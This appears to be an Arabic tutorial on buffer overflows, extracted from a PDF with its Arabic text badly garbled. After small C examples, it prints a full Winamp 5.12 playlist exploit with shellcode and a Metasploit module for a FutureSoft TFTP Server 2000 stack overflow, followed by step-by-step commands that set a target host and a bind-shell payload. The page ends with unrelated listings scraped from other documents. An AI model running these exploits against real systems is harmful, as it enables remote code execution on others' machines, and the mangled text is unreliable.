Introduction to buffer overflow
|
|
- Linette Robbins
- 5 years ago
- Views:
Transcription
1 Introduction to buffer overflow الذ ى جزذئ ششػ فظ ضغشاد Buffer overflow ا ىبرت/شبعغ ااالثالالالي ؿجؼب ا ىض ١ ش ٠ غ زا ا ع ا ضغشاد ى رؼشف الص رى ؼبن خجش طغ ١ ش ف ا جش غ ى ا ب ؽششؽ ب ى ا ظفش ؽز رف ا لج ب ادخ ف ا جفش ؽجذاء ف ا ف ١ غ ====================== ا ف ١ غoverflow ا ف ١ غ ا ض ٠ بد ػ رؾ ا ش ء ا ا ه رض ٠ ذ ػ ش ف ق ا غ ػ ضبي ظ ثش ب ظ ث غ ++c ع ٠ م ثؼ ا ؼشة ث ١ سل ١ و ب ف ايص س
2 ؽ شفز و ١ ف ا ف ١ غ ر ثأدخبي ل ١ وج ١ ش رزوش ا ب ب ص ب ف ششػ اال فش ف ١ ظ ف ا جفش ؿجؼب زا ا فش ا ب ارا وب ا خبء ثفش ؽزظ ش ز ا شعب ا خبء و ب ع ف اششػ ى اال Introduction to buffer overflow اال ف ز ا ٠ ش ؼ ا ف ١ غ اال ذي ف ا جفش ش ٠ ا غ ثذ رؼم ١ ذ
3 اف ؼ خ خ step by step ا جفش ا فش ف / ا جفش ا فش ف ػجبس ػ خبء ثش غ ا مض ثش غ ثبالطؼ ٠ غف ػ ظ ثش ب ظ ٠ غ ؼ ه زا ا خبء ا ا مض ا جش غ ا ه رؼ رؾى ف ا زاوش ػ ذ ب رذخ ث ١ ب بد رف ق ا جفش ا ع د ف ا زاوش ض اػ ١ ا ل ب ث ب ف اال فش ف ز ه ع ١ ذ buffer overflow ا جفش رؾذس ف ؽ ١ ا جش ظ ٠ ؼ ع بػ ألدخبي ش ء ٠ غف ػ اػبء رؾذ ٠ ذ ششؽ فؼ ذ ادخبي ث ١ ب بد ف ا ؾذد ٠ ؾذس ب ا جفش و ب ؽ ػؼ ى ا جفش ثب زج ١ ك ػ صغش Winamp 5.12 Remote Buffer Overflow Universal Exploit ا ز ١ ب ػ ا جش ب ظ ا ش س 5.12 Winamp ى ثبأل ي ثغ ١ ت ى ضبي طغ ١ ش ط ذ ثش ب ظ طغ ١ ش ٠ م ثجبػ سعب ػ ا شبش ب ا ى د #include<stdio.h> #include<string.h> main() { char a [10] ; printf ("enter a: ") ; scanf ("%s",a) ; printf ("coded by shaja %s ", a) ; } ؿجؼب اؽ ب ب ػشف ب ا م ١ a زجغ ا ض ا رذخ ا ذ ثب ظف ف [10] ٠ ؼ ٠ ؼ اوجش ل ١ 10 ؽش ف ؿجؼب ف ا زشغ ١ ا ؼبد ؽزظ ش ا شعب و ب ا ب ارا وجش ب ا ؼجبس اوضش ػشش ؽش ف ض ارا وزج ب shaja ؽزظ ش ا شعب و ب ا ب ارا وزج ب اوجش ػشش ؽش ف ضshaaaaaaaaaaaaaaaaaajaaaaaaaaaaaaaaaaaaa ؽزظ ش سعب خبء ض ا س ٠ زى ف ا جذا ٠ ى ر ه سعب ثش ب ظ++ c turbo ا ب ف ا ف ١ غ اي ؼ compile ؼ ا شبء ف ر ف ١ ز exe ذخ ا ى اال ش ف ا ز ١ غ و ب ف ا ظ س
4 اع ١ ت ى ضبي اخش اطؼت اال ي ف ف ١ غ د اي ا ؾ مبد زا و د ا زىشاس ٠ loopاعزخذ ذ داfor #include <stdio.h> void f1(void) { printf("a"); }; void f2(void) { printf("b"); }; void f3(void) { printf("c"); }; void (*f[3])() = { f1,f2,f3 }; void main(void) { int i,j,k; for (i=0; i<100; i++) { for (j=0; j< ; j++) ; k=i/33; if (k>3) continue; f[k](); }; printf("\n"); }; الؽظ ف f[k](); ب ا خبء ػ ذ ب رى ا م ١ 99= I ؿجؼب ش ؽزف ا ىال اال ارا وب ه خجش ف غ ا غ ػ ا ؼ ش ؽمؼذ ا ػ ع اال ف ب و ١ ف ا جفش اال ؽ جك صغش ف اعزض بس ا جفش ف ر ف ١ ز ا ش ؼ ١ ػ ا ؾبعت ؿجؼب صغشاد ا جفش زشع ث غ ++c c ز ه ٠ غت ا ٠ ى ذ ٠ ه ثش ب ظ زغش ز ا غ ؿجؼب ثشا ظ رشع غ ا غ ا غ ث ظ ث ظ اش ش ب Microsoft Visual C Turbo c++ ز ا جشا ظ ا زخظظ ى ب ر فغ ف رشع ا ضغشاد أل ب ال رؾز ػ ىزج ا ذ اي window.h و ب ٠ ى ه اعزخذا Digital Mars C/C++ Compilers ى ف غبي ا ضغشاد ٠ فؼ ارغزخذا ا جشا ظ ا ز رزشع ػ ؿش ٠ ك ا ش ا ١ ىظ ع ف غزخذ ب ثش ب ظ cygwin ا ٠ ؼ ١ ه ث ١ ئ ١ ىظ ا فؼ ى ػ ذ ا ز ظ ١ ت الص ر ضي ىزجبد غ ++ c c ف ال رؼبف ا افزشاػ
5 شب ذ ا ظ س ف اص ب ر ظ ١ ت ا غ ١ غ ٠ و ب اػف ا ٠ ؼب doc man أػف editor vim اال ؼبن ث ١ ئ ١ ىظ اال جك صغشExploit Winamp 5.12 Remote Buffer Overflow Universal ا رغ ؼ ه ثزؾى اؽ ب ب ؽ فز ثأ ش فزؼ ا ؾبعج cmd.exe و ب ٠ ى فزؼ أ رجك ا ش ٠ ف ١ ذن ا خزشق و د ا ضغش #include <windows.h> #include <stdio.h> #define BUF_LEN 0x045D #define PLAYLIST_FILE "crafted.pls" char szplaylistheader1[] = "[playlist]\r\nfile1=\\\\"; char szplaylistheader2[] = "\r\ntitle1=~bof~\r\nlength1=fff\r\nnumberofentrie s=1\r\nversion=2\r\n"; // Jump to shellcode char jumpcode[] = "\x61\xd9\x02\x02\x83\xec\x34\x83\xec\x70\xff\ xe4"; // Harmless cmd.exe char shellcode[] = "\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xf f\xff\xc0\x5e\x81\x76\x0e\x02"
6 "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x0 2\xdd\x85\x08\x3e\x56\x72\x48" "\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x8 9\xe9\x85\x4c\xec\xec\xce\xd4" "\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x3 9\x89\x2a\x49\x77\x38\x85\x12" "\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x8 9\xc1\x85\x4c\xe9\x54\x52\x69" "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x8 9\x9d\x02\xc6\x72\xc1\xa3\xc6" "\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3 e\x82\x3f\xbb\x62\x8b\x87\xb5" "\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x8 8\xd3\x59\xb2\xe5\xbe\x6f\x21" "\x61\xdd\x0e\x4d"; int main(int argc,char *argv[]) { printf("\nwinamp 5.12 Remote Buffer Overflow Universal Exploit"); printf("\nbug discovered & exploit coded by ATmaCA"); printf("\nweb: && printf("\n atmaca@icqmail.com"); printf("\ncredit to Kozan"); FILE *File; char *pszbuffer; if ( (File = fopen(playlist_file,"w+b")) == NULL ) { printf("\n [Err:] fopen()"); exit(1); } pszbuffer = (char*)malloc(buf_len); memset(pszbuffer,0x90,buf_len); memcpy(pszbuffer,szplaylistheader1,sizeof(szplayli stheader1)-1); memcpy(pszbuffer+0x036c,shellcode,sizeof(shellcode )-1); memcpy(pszbuffer+0x0412,jumpcode,sizeof(jumpcode)-1); memcpy(pszbuffer+0x0422,szplaylistheader2,sizeof(s zplaylistheader2)-1); fwrite(pszbuffer, BUF_LEN, 1,File); fclose(file); printf("\n\n" PLAYLIST_FILE " has been created in the current directory.\n"); return 1; }
7 داخcygwin home ؾفظ ا ضغش ثب زذاد c داخ غ ذ ا ١ صس ؽمه ف غ ذ فزؼcygwin فز ا ش ا زشع ض Gcc shaja.c o shaja و ب ف ا ظ س
8 اال شغ ا ضغش ثىزبثshaja /. و ب ف ا ظ س و ب شفز سعب ا ز ف ١ ز crafted.pls has been created in the current directory. ر ا شبء لبئ ا زشغ ١ ؽك ا جش ب ظ Winamp 5.12 شب ذ ا ظ س
9 ؿجؼب ا ف ػ ٠ م ثؼ ثفش ٠ ى ه ر ف ١ ز رؾى ض ب ل ب ف اال ي اال شغ ا ف ثغؾج ا ف ق ثش ب ظ 5.12 Winamp ا فزؾ جبشش ع ف رش CALC.EXE افززؼ ؼب ب ثؼذ ب افززؼ 5.12 Winamp ش ف ا ظ س
10 ث زا ا ذ ػ ذ رؾى ٠ ؼ فزد ا ش فزؼ ا ؾبعج calc ؿجؼب ز صغش buffer overflow ع ؿجؼب ب فزد ا ش فزؼ ا ؾبعج ارا ا ذ ثذن رغ ١ ش غ ١ ش ف ا ش و فب ش و د shell code ا رفز ا ش فزؼ ا ؾبعج فأ ذ ا رغش ٠ رظ ؼ ٠ ى خبص ثغ بصن ز ط س ر ػ ١ ؾ ١
11 رؾ ١ صغشاد ا ف ١ غ ا زؾى ػ ثؼذ Remote Buffer ثإعزخذاFramework Metasploit ف زا ا ػ ع ع أخز فىشح ػ ؽض خ Metasploit Framework ؽض خ ز سح إلعزغالال ضغشاد األ ١ خ زح ا ؾض خ ز افمخ غ و األ ظ خX Linux, Windows, BSD, MacOS إعزخذا ب اؽذ ف ا ظب إػبفخ إ ا ب ثغ ١ خ عذا,, ع م ثذساع أخش ضغشاد Remote ا ا زؾى ػ ثؼذ و ١ ف رؾذس و ١ ف رغزغ. جذأ ف ١ ب ػ ع: ضب ب ا ١ ػ ثش ب ظ TFTP Server 2000 ػجبسح ػ ع ١ شفش Trivial File Transfer Protocol م ا فبد رغز ١ غ ا ؾظ ي ػ ا جش ب ظ لغ ا ششوخ ا زغخ ؿش ٠ ك Control Panel ص Administrative Tools إخزش Services ثؼذ رضج ١ ذ ا غ ١ شفش ف ع بصن شغ ػ
12 عزظ ش ه و ا غ ١ شفشاد ا ز ف ع بصن اثؾضؼ TFTP Server 2000 إػغؾ ثب ضس األ ٠ ب ط ص start ث زا ى شغ ب ا غ ١ شفشث غبػ. ا ي ب ٠ شزغ ا غ ١ شفش ٠ جذأ ثفزؼ فز 69 جش ر و ي UDP زأوذ ب ػ ع رؾزبط ا ثش ب ظ ٠ ؼشع ه ا بفز إ ب ػ ؿش ٠ ك ا ذ ط netstat a- n- ا ػ ش ٠ ك ا اداح خبسع ١ خ,ث زا ا شى ٠ فزؼ ا غ ١ شفش ا ج سد ١ ى 69 عب ض إلعزمجبي ا فبد,, ف زا ا غ ١ شفش خأاد ؾذ س صغشح الؽظ خالي olly لبئ خ file إخزش Attach عزظ ش ه ا جشا غب ز رؼ ف ا زاوشح إخزشtftpd C:\WINDOWS\system32\tftpd.exe ثؼذ إخز ١ بس ا جش ب ظ ػغ مبؽ ر لف ػ أ بو ؼب غخ إع ا ف ػ ذ اإلعزمجب اإلسعبي ٠ جذأ ا جش ب ظ ثإعزمجبي إع ا ف ػ ذ ا زؼ ١ خ AA ثؼذاسثؼ اعش رغذ دا ا خش,,, strcpy ٠ ؾذس ف ١ غ ف ز ا ذا ػ ذ إعزمجبي إع ف ٠ ػغ مخ ر لف ػ ذ ا ؼ ا,,, ا ضي بفزح ثش ب ظ olly ا ؾ ١ ث ز ع إ Metasploit Framework ا ضغشح ظ شد ف الغ األ ث عpm
13 ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::futuresoft_tftpd; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'FutureSoft TFTP Server 2000 Buffer Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'y0 [at] w00t-shell.net', ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ], 'Priv' => 0, 'AutoOpts' => { 'EXITFUNC' => 'process' }, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 69], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Payload' => { 'Space' => 350, 'BadChars' => "\x00", 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", 'Keys' => ['+ws2ord'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a stack overflow in the FutureSoft TFTP Server
14 2000 product. By sending an overly long transfer-mode string, we were able to overwrite both the SEH and the saved EIP. A subsequent write-exception that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This module has been tested against Windows 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all). }), 'Refs' => [ ['CVE', ' '], ['BID', '13821'], ['URL', ' ], 'Targets' => [ ['Windows 2000 Pro English ALL', 0x75022ac4], # ws2help.dll ['Windows XP Pro SP0/SP1 English', 0x71aa32ad], # ws2help.dll ['Windows NT SP5/SP6a English', 0x776a1799], # ws2help.dll ['Windows 2003 Server English', 0x7ffc0638], # PEB return ], 'Keys' => ['tftpd'], }; sub new{ my $class = shift; my $self = $class->super::new({'info' => $info, 'Advanced' => return($self); } sub Exploit { my $self = shift; my $target_host = $self->getvar('rhost'); my $target_port = $self->getvar('rport'); my $target_idx = $self->getvar('target'); my $shellcode = $self->getvar('encodedpayload')->payload; my $target = $self->targets->[$target_idx]; if (! $self->initnops(128)) {
15 $self->printline("[*] Failed to initialize the nop module."); return; } my $splat = Pex::Text::AlphaNumText(142); my $sploit = "\x00\x01". "metasploit.txt". "\x00". $splat. "\xeb\x06". pack('v', $target->[1]). $shellcode. "\x00"; $self->printline(sprintf("[*] Trying to exploit target %s w/ return 0x%.8x", $target->[0], $target->[1])); my $s = Msf::Socket::Udp->new ( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->getvar('cport'), 'SSL' => $self->getvar('ssl'), ); if ($s->iserror) { $self->printline('[*] Error creating socket: '. $s- >GetError); return; } $s->send($sploit); $self->handler($s); $s->close(); return; } إ غخ وب و د اإلعزغالي إ ف ظ, غ ا ف futuresoft_tftpd.pm أل و داإلعزغالي ٠ جذأ ة Msf::Exploit::futuresoft_tftpd إ غخ ا ف futuresoft_tftpd.pm إ ا غ ذ C:\Program Files\Metasploit Framework\home\framework\exploits - ا ٢ شغ, Framework Metasploit لبئ خ start ص Metasploit Framework شغ MSFConsole عزجذأ بفزح ا ذ ط ف ا ظ س ثشؼبس,, Metasploit جذأ ثز ف ١ ز األ ا ش - 1 األ شاأل يuse زؾذ ٠ ذ إع ا ضغشح ا ز ع غزخذ ب futuresoft_tftpd الؽظ ثذ pm
16 ث ؼ ا ي ا ش غزخذ : use futuresoft_tftpd عزالؽظ رغ ١ ش عش اال ا ش إ msf futuresoft_tftpd > الؽظ ا ظ سح: صب ١ ب : ا ش show ا ا ؼشع ٠ مغ إ 3 أ اع األ ي show options إلظ بس رؾذ ٠ ذ إخز ١ بساد ا ضغشح ض سل ا فز ػ اip ا ضب show payloads إلظ بس رؾذ ٠ ذ ا ش ١ و د shellcode ا ز عزم ثز ف ١ زح ا ضب ش show targets إلظ بسا ذف ا ؾذد ض ظب رشغ ١ ا رج ١ ك ٠ ت غ رؾذ ٠ ذ اإلطذاس جذأ ثأ ي مخ : فز show options عزالؽظ ظ س 3 خظبئض 1 زا اإلخز ١ بس ال غزخذ إ إرا وب ا لغ ٠ غزخذ ش بدح ا زؾمكhttps SSL 2 سل 3 ip ا ج سد رالؽظ ا ا ج سر ؾذد,, 69 الؽظ و ١ ف ع م ثإػبدح ا زؾذ ٠ ذ زؾذ ٠ ذ ip ع غزخذ ا ش عذ ٠ ذ, set الؽظ ع ؾذد port ip ث زا ا شى set RPORT 69 set RHOST الؽظب ظ سح ثؼذ ر ه رؾذ ٠ ذ payloads ا ٠ فش shellcode Metasploit أ اع وض ١ شح إؽزشاف ١ خshellcode شؤ ٠ ز ب رؾذ ٠ ذ ب فز اال شpayloads show الؽظ ع م ثإخز ١ بسا ش و د ا ؼش ف فزؼ فز عذ ٠ ذ ا ثبة خ ف ذخ ي غ بص win32_bind فزاال ش set PAYLOAD win32_bind الؽظ ا ظ سح ا ز ػ ١ ؾ ١ خ :
17 ثؼذ ر ه رؾذ ٠ ذ ا ذف, targets فز اال ش show targets ؼشع ا اع ا ذف ف ١ ضب ب األ ذاف ا ز فشح: 0 Windows 2000 Pro English ALL 1 Windows XP Pro SP0/SP1 Englis 2 Windows NT SP5/SP6a English 3 Windows 2003 Server English غز ١ غ رؾذ ٠ ذ ا ذف, الؽظ ع م ثإخز ١ بس WinXP sp0/sp1 ث ؼ اإلخز ١ بس 1 ث زا ا شى 1 set TARGET - ثؼذ اإل ز بء إػذاداد ا ضغش, فز ا ش, options show زأوذ و ا خظبئض ث زا ا شى
18 ث زا ى ا ز ١ ب زج ١ ك رأوذ ا ا ظب winxp sp0 ا sp1 أ ا جش ب ظServer TFTP 2000 Evaluation Version ٢ فز ا ضغش ثإعزخذا اال ش,, exploit الؽظ ثش ب ظ olly ا ز غ ١ ب ع ١ ؼ ١ ه إشبسح.. ر ر ف ١ ز ا ضغشح رزجؼب ى د ثإعزخذا فزبػ F8 الؽظ رشغ ١ ايshellcode ث زا ى أخز ب فىشح ػ أداح أصجزذ عذاسر ب ف ػب األ Metasploit Framework ا ز ١ ذ ا ذسط ا ىب ف ا ذسط ا مج ا شبء اهلل عأ ػؼ ى ثب زفظ ١ ollydbg و ١ ف ١ دساع ا جشا ظ ثب اخ و شبطع tel
19 009j
ياىي Asp.Net MVC ا ز رزؤ ف ص ٩ صخ أعضاء : ( ع زطشق ا ١ أوضش ف ا ذس ط ا مبد خ ) ثؤخزظبس ػجبسح ػ. Class
بسم رلاهللا ياىي Asp.Net MVC ػجبسح ػ ث ١ ئخ ( Framework ) رط ٠ ش رطج ١ مبد ا ٠ ت أ زبط ششوخ ب ٠ ىش ع فذ, ا غب ٠ خ ب رغ ١ ث بء رطج ١ مبد ع ١ ذ, عضء ث ١ ئخ ا زط ٠ ش ا شئ ١ غ ١ خ ( Framework.Net )..) Model,
More informationىب ١ شاد أع ضح ا شالجخ األ ١ خ
ا اصفبد ا ف ١ خ ىب ١ شاد أع ضح ا شالجخ األ ١ خ ا ج ١ ب سل ا صفؾخ سل ا ؾك ) Annex( ا ؾك ( 1 ) ا اصفبد ا ؼب خ ظب ا شالجخ األ ١ خ General specifications of the security surveillance system ا ؾك ( 2 ) ا اصفبد
More informationىب ١ شاد أع ضح ا شالجخ األ ١ خ
ا اصفبد ا ف ١ خ ىب ١ شاد أع ضح ا شالجخ األ ١ خ ا ج ١ ب سل ا صفؾخ سل ا ؾك ) Annex( ا ؾك ( 1 ) ا اصفبد ا ؼب خ ظب ا شالجخ األ ١ خ General specifications of the security surveillance system ا ؾك ( 2 ) ا اصفبد
More informationImproved Method for Sliding Window Printed Arabic OCR
th Int'l Conference on Advances in Engineering Sciences & Applied Mathematics (ICAESAM'1) Dec. -9, 1 Kuala Lumpur (Malaysia) Improved Method for Sliding Window Printed Arabic OCR Prof. Wajdi S. Besbas
More informationالسالم عليكم ورحمه هللا وبركاته
السالم عليكم ورحمه هللا وبركاته هذا الكتيب يتناول اداه من اقوى ادوات الموجوده لدى مختبرين االختراق. Metasploit الم تاسبلو ت تم اصدارها عام HD moore 2003 من قبل بدا تها كانت ال بأس بها لكن مع مرور 5 سنوات
More informationWeb-Based Application Performance Monitoring Tool
Sudan University of Science and Technology Faculty of Computer Science and Information Technology Web-Based Application Performance Monitoring Tool October 2017 THESIS SUBMITTED AS A PARTIAL REQUIREMENTS
More informationUmbrella. Branding & Guideline
Umbrella. Branding & Guideline OUR LOGO. OUR COLORS. #FFFFFF Font COLOR #2A3942 #64A0C6 mix color C: 75% M: 68% Y: 67% K: 90% H: 320 S:61% B:0 R:0 G:0 B:0 C: 75% M: 68% Y: 67% K: 90% H: 320 S:61% B:0 R:0
More informationموه ا و ثب ؾب ة ئػلاك
موه ا و ثب ؾب ة- 1495 ئػلاك بهق هؽبي أ. 2015-2014 1 ف و ا ل ١ ؾز ٠ بد 2 2 3 8 44 58 75 األ لاف... مل خ... ا م األ ي... ا م ا ضب... ا م ا ضب ش... ا م ا واثغ... ا م ا قب... األ لاف: ٠ زظو ه ػي ٠ ي ا طب ت
More informationREEM READYMIX Brand Guideline
REEM READYMIX Brand Guideline Implementing Reem Readymix brand in communications V.I - February 2018 Introduction Reem Readymix is a leading supplier of all types of readymix concrete and cementbased plastering
More informationMEMORANDUM OF UNDERSTANDING. between [PLEASE INSERT NAME OF THE OVERSEAS GOVERNMENT AGENCY AND NAME OF THE COUNTRY] and
MEMORANDUM OF UNDERSTANDING between [PLEASE INSERT NAME OF THE OVERSEAS GOVERNMENT AGENCY AND NAME OF THE COUNTRY] and THE PUBLIC PRIVATE PARTNERSHIP AUTHORITY, PRIME MINISTER S OFFICE, THE PEOPLE'S REPUBLIC
More informationArabic Text Segmentation
Arabic Text Segmentation By Dr. Salah M. Rahal King Saud University-KSA 1 OCR for Arabic Language Outline Introduction. Arabic Language Arabic Language Features. Challenges for Arabic OCR. OCR System Stages.
More informationOUR LOGO. SYMBOL LOGO SYMBOL LOGO ORIGINAL STRUCTURE
OUR LOGO. ORIGINAL STRUCTURE SYMBOL LOGO SYMBOL LOGO OUR COLORS. Infographic Color 2A3942 FED708 2A3942 E77525 804D9F CLEAR SPACE. PRINT SAFE AREA MINIMUM SIZE - PRINT H: 30 pt ONLINE SAFE AREA MINIMUM
More informationIdentity Guidelines. December 2012
Identity Guidelines December 2012 Identity Guidelines Contents 1.0 Our Logo Our logo Our wordmark Colour treatments Clear space, large and small sizes Correct logo placement Incorrect logo usage 2.0 Colour
More informationModeling Nasta leeq Writing Style
Modeling Nasta leeq Writing Style Aamir Wali National University of Computer and Emerging Sciences Overview: Urdu اب پ ت ٹ ث ج چ ح خ د ڑ ڈ ذ ر ز ژ س ش ص ض ط ظ ع غ ف ق ک گ ل م ن ه ء ی ے ہ ں و In Urdu, a
More informationqatar national day 2017 brand guidelines 2017
2017 brand guidelines 2017 the following guidelines demonstrate how best to apply the brand 2 CONTENTS 3 contents p5. vision & mission p7. logo p8. logo rationale p9. logo clear space p10. logo do s p11.
More informationPrinted and Handwritten Arabic Characters Recognition and Convert It to Editable Text Using K-NN and Fuzzy Logic Classifiers
Journal of University of Thi-Qar Vol.9 No. Mar.4 Printed and Handwritten Arabic Characters Recognition and Convert It to Editable Text Using K-NN and Fuzzy Logic Classifiers Zamen F. Jaber Computer Department,
More informationPERFORMANCE OF THE GOOGLE DESKTOP, ARABIC GOOGLE DESKTOP AND PEER TO PEER APPLICATION IN ARABIC LANGUAGE
PERFORMANCE OF THE GOOGLE DESKTOP, ARABIC GOOGLE DESKTOP AND PEER TO PEER APPLICATION IN ARABIC LANGUAGE Abd El Salam AL HAJJAR, Anis ISMAIL, Mohammad HAJJAR, Mazen EL- SAYED University Institute of TechnologyLebanese
More informationLecture Introduction to C++ 1 Introduction to Computer Science
1 Introduction to Computer Science Lecture 10 - Introduction to C++ 1 2 Introduction to Computer Science البرمج بلغ ++C ممجزات لغ ++C: لغ عام : لغ تركجبج : رصهر نؼ م ثشايح يخزهفخ كجشايح ل اػذ انج ب بد
More information3 Qurʾānic typography Qurʾānic typography involves getting the following tasks done.
TUGboat, Volume 31 (2010), No. 2 197 Qurʾānic typography comes of age: Æsthetics, layering, and paragraph optimization in ConTEXt Idris Samawi Hamid 1 The background of Oriental TEX Attempts to integrate
More informationMicrosoft Word 2007 إعداد أمل امحد رئيص قطم جكنولوجيا املعلومات مكحبة البحر األعظم العامة مجعية الرعاية املحكاملة
2009 Microsoft Word 2007 إعداد هبة حممود حممد األمري رئيص قطم جكنولوجيا املعلومات مكحبة البحر األعظم العامة مجعية الرعاية املحكاملة - مراجعة رشا عصمث رئيص قطم جكنولوجيا املعلومات املركس الثقايف عال مرضي
More informationProposed keyboard layout for Swahili in Arabic script
أ Proposed keyboard layout for Swahili in Arabic script Kevin Donnelly kevin@dotmon.com Version 0.1, March 2010 Introduction Swahili was originally written in Arabic script in its area of origin (the littoral
More informationTHE LOGO Guidelines LOGO. Waste Free Environment Brand Guidelines
BRAND GUIDELINES THE LOGO Guidelines LOGO SYMBOL TYPEFACE 2 COLOR SCHEME When do I use the full-color logo? Use the full-color logo as frequently as possible to maximize and strengthen the brand. PRIMARY
More informationجبيؼخ انقذط ان فز دخ كه خ انزك ن ج ب انؼه و انزطج ق خ انذن م انؼ ه ن قشس يؼبنجخ انج ب بد 1187 نسخة رقم )1(
جبيؼخ انقذط ان فز دخ كه خ انزك ن ج ب انؼه و انزطج ق خ انذن م انؼ ه ن قشس يؼبنجخ انج ب بد 1187 إػذاد د. يبجذ د ب م 2014/2013 نسخة رقم )1( 1 ف شط يذز بد انذن م يقذيخ انذن م أ ذاف انذن م يزطهجبد انذن م انقغى
More informationISO/IEC JTC 1/SC 2. Yoshiki MIKAMI, SC 2 Chair Toshiko KIMURA, SC 2 Secretariat JTC 1 Plenary 2012/11/05-10, Jeju
ISO/IEC JTC 1/SC 2 Yoshiki MIKAMI, SC 2 Chair Toshiko KIMURA, SC 2 Secretariat 2012 JTC 1 Plenary 2012/11/05-10, Jeju what is new Work items ISO/IEC 10646 2 nd ed. 3 rd ed. (2012) ISO/IEC 14651 Amd.1-2
More informationBRAND GUIDELINES JANUARY 2017
BRAND GUIDELINES JANUARY 2017 GETTING AROUND Page 03 05 06 07 08 09 10 12 14 15 Section 01 - Our Logo 02 - Logo Don ts 03 - Our Colors 04 - Our Typeface 06 - Our Art Style 06 - Pictures 07 - Call to Action
More informationVOL. 3, NO. 7, Juyl 2012 ISSN Journal of Emerging Trends in Computing and Information Sciences CIS Journal. All rights reserved.
Arabic Hand Written Character Recognition Using Modified Multi-Neural Network Farah Hanna Zawaideh Irbid National University, Computer Information System Department dr.farahzawaideh@inu.edu.jo ABSTRACT
More information1. Brand Identity Guidelines.
1. Brand Identity Guidelines 1.1 HCT Logo 2. Secondary left aligned for English language literature 1. Primary centre aligned stacked formal 3. Secondary right aligned for Arabic language literature 4.
More informationSCALE-SPACE APPROACH FOR CHARACTER SEGMENTATION IN SCANNED IMAGES OF ARABIC DOCUMENTS
31 st December 016. Vol.94. No. 005-016 JATIT & LLS. All rights reserved. ISSN: 199-8645 www.jatit.org E-ISSN: 1817-3195 SCALE-SPACE APPROACH FOR CHARACTER SEGMENTATION IN SCANNED IMAGES OF ARABIC DOCUMENTS
More informationISeCure. The ISC Int'l Journal of Information Security. High Capacity Steganography Tool for Arabic Text Using Kashida.
The ISC Int'l Journal of Information Security July 2010, Volume 2, Number 2 (pp. 107 118) http://www.isecure-journal.org High Capacity Steganography Tool for Arabic Text Using Kashida Adnan Abdul-Aziz
More informationImprove On-Demand Multicast Routing Protocol in Mobile Ad-Hoc Networks المتعذد حسب الطلب
Improve On-Demand Multicast Routing Protocol in Mobile Ad-Hoc Networks تحسين بروتوكول التوجيه ODMRP في الشبكات الالسلكية المخصصة المتنقلة المتعذد حسب الطلب Dr. Intisar Al-Mejibli Informatics Systems Management
More informationStrings 20/11/2018. a.k.a. character arrays. Strings. Strings
ECE 150 Fundamentals of Programming Outline 2 a.k.a. character arrays In this lesson, we will: Define strings Describe how to use character arrays for strings Look at: The length of strings Copying strings
More informationManaging Resource Sharing Conflicts in an Open Embedded Software Environment
Managing Resource Sharing Conflicts in an Open Embedded Software Environment Koutheir Attouchi To cite this version: Koutheir Attouchi. Managing Resource Sharing Conflicts in an Open Embedded Software
More informationSHEFA STORE CORPORATE DESIGN MANUAL BRAND & FUNCTION // CORPORATE DESIGN GUIDELINES. 01 : Corporate Identity. 02 : Corporate Stationery
BRAND & FUNCTION // CORPORATE DESIGN GUIDELINES SHEFA STORE CORPORATE DESIGN MANUAL 01 : Corporate Identity 02 : Corporate Stationery 03 : Interactive Designs www.shefa-store.com Corporate Identity 01
More informationImage Coloring using Genetic Algorithm
Republic of Iraq Ministry of Higher Education And Scientific Research Baghdad University College of Science Image Coloring using Genetic Algorithm A Project Report Submitted to the College of Science,
More information1- Table des matières La classe string en C++ :... 2 Les fichiers en C++ :... 7 Standard Template Library (STL):...11
1- Table des matières La classe string en C++ :... 2 Les fichiers en C++ :... 7 Standard Template Library (STL):...11 La gestion des exceptions :...12 Hichem Felouat hichemfe@hotmail.fr Page 1 1- La classe
More informationProposed Solution for Writing Domain Names in Different Arabic Script Based Languages
Proposed Solution for Writing Domain Names in Different Arabic Script Based Languages TF-AIDN, June/2014 Presented by AbdulRahman I. Al-Ghadir Researcher in SaudiNIC Content What we have done so far? Problem
More informationAward Winning Typefaces by Linotype
Newly released fonts and Midan awarded coveted design prize Award Winning Typefaces by Linotype Bad Homburg, 23 April 2007. Linotype has once again received critical recognition for their commitment to
More informationJournal of Kerbala University, Vol. 11 No.4 Scientific. 2013
Extending Public Switched Telephone Networks Billing Services Using VoIP Applications جعزيز الخدمات الححاسبية لشبكات الهاجف العامة باسحخدام جطبيقات الصىت عبر بروجىكىل اإلنحرنث Saif Ali Abed Computer Science
More informationSegmentation and Recognition of Arabic Printed Script
Institute of Advanced Engineering and Science IAES International Journal of Artificial Intelligence (IJ-AI) Vol. 2, No. 1, March 2013, pp. 20~26 ISSN: 2252-8938 20 Segmentation and Recognition of Arabic
More informationOnline Arabic Handwritten Character Recognition Based on a Rule Based Approach
